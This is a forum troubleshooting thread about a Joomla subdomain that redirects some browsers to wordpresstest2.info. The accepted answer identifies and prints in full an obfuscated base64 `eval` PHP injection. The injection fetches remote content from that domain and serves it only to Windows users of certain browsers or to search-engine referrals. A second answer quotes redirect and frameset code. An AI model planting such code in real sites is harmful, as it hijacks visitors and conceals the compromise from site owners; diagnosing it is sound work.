# Strange redirection with my joomla website to wordpresstest2.info

Tags: firefox, redirect, joomla

Please help me to resolve this issue. I have two linked joomla websites, the principal www.orthojunior.fr works perfectly but the second pro.orthojunior.fr which enter when clicking the PRO section work only on some webnavigator (chrome, maxthon, ...) and when I try to open it on firefox, palemoon, IE, (...) it redirect to : http://wordpresstest2.info/....

Comment: it doesn't redirect for me in FF, it simply shows a blank screen

Comment: This domain has expired. Kindly login to your Control Panel should you wish to renew it.!

Comment: How the domain expired and it work on others webnavigators ?
We are talking here about the subdomain : pro.orthojunior.fr and not the domain because the domain www.orthojunior.fr is working perfectly.

Answer (score 0, accepted):

That was the problem :
eval(base64_decode("JHVybCAgICAgICA9ICdodHRwOi8vd29yZHByZXNzdGVzdDIuaW5mby8xLnR4dCc7DQokbW9kZSAgICAgID0gMTsvLzEg6OvoIDINCg0KaW5pX3NldCgnZGVmYXVsdF9zb2NrZXRfdGltZW91dCcsICAgIDE1KTsgICAgDQoNCg0KDQovL8fg7/Du8SDqIO3g+OXs8yD17vHy818NCmZ1bmN0aW9uIGdldHVybF8xKCR1cmwpDQp7DQoJJGN0eD1zdHJlYW1fY29udGV4dF9jcmVhdGUoYXJyYXkoJ2h0dHAnPT4gICBhcnJheSgndGltZW91dCcgPT4gMTUgKSkpOw0KDQoJcmV0dXJuIGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwsZmFsc2UsJGN0eCk7DQp9DQoNCi8vx+Dv8O7xIOog7eD45ezzIPXu8fLzXzIgXCDR7url8vsNCmZ1bmN0aW9uIGdldHVybF8yKCAkc29jaywkaG9zdCwgJHBhdGgsICRxdWVyeSApDQp7DQoJZnB1dHMoJHNvY2ssICJHRVQgIiAuICRwYXRoIC4gIj8iIC4gJHF1ZXJ5IC4gIiAgSFRUUC8xLjBcclxuIiAuDQoJIkhvc3Q6ICRob3N0XHJcbiIgLg0KCSJVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA1LjE7IGVuLVVTOyBydjoxLjguMC4zKSBHZWNrby8yMDA2MDQyNiBGaXJlZm94LzEuNS4wLjNcclxuIiAuDQoJIkFjY2VwdDogKi8qXHJcbiIgLg0KCSJBY2NlcHQtTGFuZ3VhZ2U6IGVuLXVzLGVuO3E9MC41XHJcbiIgLg0KCSJBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43XHJcbiIgLg0KCSJLZWVwLUFsaXZlOiAzMDBcclxuIiAuDQoJIkNvbm5lY3Rpb246IGtlZXAtYWxpdmVcclxuIiAuDQoJIlJlZmVyZXI6IGh0dHA6Ly8kaG9zdFxyXG5cclxuIik7DQoJd2hpbGUgKCAkbGluZSA9IGZyZWFkKCAkc29jaywgNDA5NiApICkNCgl7DQoJCSRyZXNwb25zZSAuPSAkbGluZTsNCgl9DQoJZmNsb3NlKCAkc29jayApOw0KCSRwb3MgICAgICA9IHN0cnBvcygkcmVzcG9uc2UsICJcclxuXHJcbiIpOw0KCSRyZXNwb25zZSA9IHN1YnN0cigkcmVzcG9uc2UsICRwb3MgKyA0KTsNCglyZXR1cm4gJHJlc3BvbnNlOw0KfQ0KLy/H4O/w7vEg6iDt4Pjl7PMg9e7x8vNfMyBcIMrz8Ov7DQpmdW5jdGlvbiBnZXR1cmxfMygkdXJsKQ0Kew0KCSRjaCA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCBGQUxTRSk7DQoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCBUUlVFKTsNCgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTUpOw0KCSRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTsNCgljdXJsX2Nsb3NlKCRjaCk7DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQoNCmZ1bmN0aW9uIGlzX2dvb2RfdWEoJHVzZXJhZ2VudCkNCnsNCglpZiggc3RyaXBvcygkdXNlcmFnZW50LCAnb3BlcmEnKSE9PWZhbHNlIHx8IHN0cmlwb3MoJHVzZXJhZ2VudCwgJ0ZpcmVmb3gnKSB8fCBzdHJpcG9zKCR1c2VyYWdlbnQsICdNU0lFJykpDQoJew0KCQlyZXR1cm4gMTsNCgl9DQoJcmV0dXJuIDA7DQp9DQoNCmZ1bmN0aW9uIGlzX3dpbmRvd3NfdWEoJHVzZXJhZ2VudCkNCnsNCglpZihzdHJpcG9zKCR1c2VyYWdlbnQsICd3aW5kb3dzJykpDQoJew0KCQlyZXR1cm4gMTsNCgl9DQoJcmV0dXJuIDA7DQp9DQoNCmZ1bmN0aW9uIG1haW53b3JrKCR1cmwpDQp7DQoJaWYoIGluaV9nZXQoImFsbG93X3VybF9mb3BlbiIpID09IDEpDQoJew0KCQllY2hvIGdldHVybF8xKCR1cmwpOw0KCX0NCgllbHNlDQoJew0KCQkkdXJsXzEgPSBwYXJzZV91cmwoJHVybCk7DQoNCgkJaWYoJHNvY2sgPSBAZnNvY2tvcGVuKCR1cmxfMVsnaG9zdCddLCA4MCwkZXJybm8sICRlcnJzdHIsMTUpKQ0KCQl7DQoJCQllY2hvIGdldHVybF8yKCAkc29jaywgJHVybF8xWydob3N0J10sICR1cmxfMVsncGF0aCddLCAkdXJsXzFbJ3F1ZXJ5J10gKTsNCgkJfQ0KCQllbHNlaWYoIEBmdW5jdGlvbl9leGlzdHMoJ2N1cmxfaW5pdCcpICkNCgkJew0KCQkJZWNobyBnZXR1cmxfMygkdXJsKTsNCgkJfQ0KCX0NCn0NCg0KDQokdWEgPSBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KDQppZihpc193aW5kb3dzX3VhKCR1YSkpDQp7DQoJaWYgKCRtb2RlID09IDEpDQoJew0KCQlpZiAoaXNfZ29vZF91YSgkdWEpKQ0KCQl7DQoJCQltYWlud29yaygkdXJsKTsNCgkJfQ0KCX0NCgllbHNlaWYgKCRtb2RlID09IDIpDQoJew0KCQlpZiAoaXNzZXQoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkNCgkJew0KCQkJJHJlZmVyZXIgPSAkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQoJCQlpZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkNCgkJCXsNCgkJCQlpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpDQoJCQkJew0KCQkJCQltYWlud29yaygkdXJsKTsNCgkJCQl9DQoJCQl9DQoJCX0NCgl9DQp9"));

Answer (score 0):

Right, I've been looking around and I believe your **index.php** in your template folder (not the **index.php** in the root folder) contains the following:

```
<!--
  top.location="http://wordpresstest2.info/?fp=8IYYVL96ucrJCyNA5kIiwUwkfLTnsnORXJ5mwJpbReoPTC8yI8NhLqg34lDwos5lNW1tc1JunsQ3906dKytmWg%3D%3D&prvtof=jvUrwNrgF4E7GNbfMIaHGZkW8rRbWzIL3jkPdsy3DSk%3D&poru=aA7Bax07Ush71w6vDQOMzDiCprWk0KEecv0MuART2Q2t4Ylf3gA1s4ZiASd7k2lcZXvEWbyIMdVf22MfDmv%2B%2Fw%3D%3D&cifr=1&";
/*
-->
<script type="text/javascript">
<!--
   dimensionUpdated = 0;
   function applyFrameKiller() {
      if(window.top != self) {
         cHeight = 0;
         if( typeof( window.innerHeight ) != 'undefined' ) {
            //Non-IE
            cHeight = window.innerHeight;
            dimensionUpdated = 1;
         } 
         else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
            //IE 6+ in 'standards compliant mode'
            cHeight = document.documentElement.clientHeight;
            dimensionUpdated = 1;
         } 
         else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
            //IE 4 compatible
            cHeight = document.body.clientHeight;
            dimensionUpdated = 1;
         }
         if( cHeight <= 250 && dimensionUpdated == 1){
            window.top.location = "http://wordpresstest2.info/?fp=8IYYVL96ucrJCyNA5kIiwUwkfLTnsnORXJ5mwJpbReoPTC8yI8NhLqg34lDwos5lNW1tc1JunsQ3906dKytmWg%3D%3D&prvtof=krhXDbq6ENaHIbW%2FUM9LSNKZHcxdry6WdJ6gf%2BkgeBA%3D&poru=Zq5OrSBXgl57oUb5ZS4jhJv5gS3E0AU4jMy6LXulxwJAjVDzDxPT%2BUeI9ybr8Qdy6ZSuSVvIoIQZ2gFEMuPLdw%3D%3D&cifr=1&";
         }
      }
   }
   applyFrameKiller();
   // -->
   </script>
      <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
         <frame src="http://wordpresstest2.info/?fp=8IYYVL96ucrJCyNA5kIiwUwkfLTnsnORXJ5mwJpbReoPTC8yI8NhLqg34lDwos5lNW1tc1JunsQ3906dKytmWg%3D%3D&prvtof=Vqe0rseCUi%2B2peWYGfP96o9VLDQ4psvTGYx8oVSrIiU%3D&poru=fQUDA3FKqmOP7lK4ZzADpn4N80L91f2v6xKLR3Jssx0jKqwc1nz5ZPp2R8v1bdA6oij4%2FIXxpaZdUowzEhV7ag%3D%3D&">
      </frameset>
   <noframes>
   <body bgcolor="#ffffff" text="#000000">
      <a href="http://wordpresstest2.info/?fp=8IYYVL96ucrJCyNA5kIiwUwkfLTnsnORXJ5mwJpbReoPTC8yI8NhLqg34lDwos5lNW1tc1JunsQ3906dKytmWg%3D%3D&prvtof=%2BpNN9Fhz7AcY6rm%2FWbgSLTuD7152RrsuXekpUn4lHqg%3D&poru=RlRTjf2r107jVfqznlXNBkIe%2FcvghDe%2FGC8yqRfzdlRnaeMr2S4u9l2nsHeefVAfnrWmWmn%2FTdJ8bmfK9NIRGg%3D%3D&">Click here to proceed</a>.
   </body>
</noframes>
<!--
*/
-->
```

**Remove all of it**

Comment: I didn't found the word "wordpresstest2.info" in any source code file in the hole website. The "index.php" related to the template is clean, I check it. Always NO solution.

Comment: hmm well it's definitely being called from somewhere. If this has only happened recently, try disabling any extensions you may have installed in that time. If that solves the issue, let me know which extension was causing the problem.

Comment: I'm sure I didn't add any extension since more than 3 months. The problem is : why it redirect only with some webnavigator ?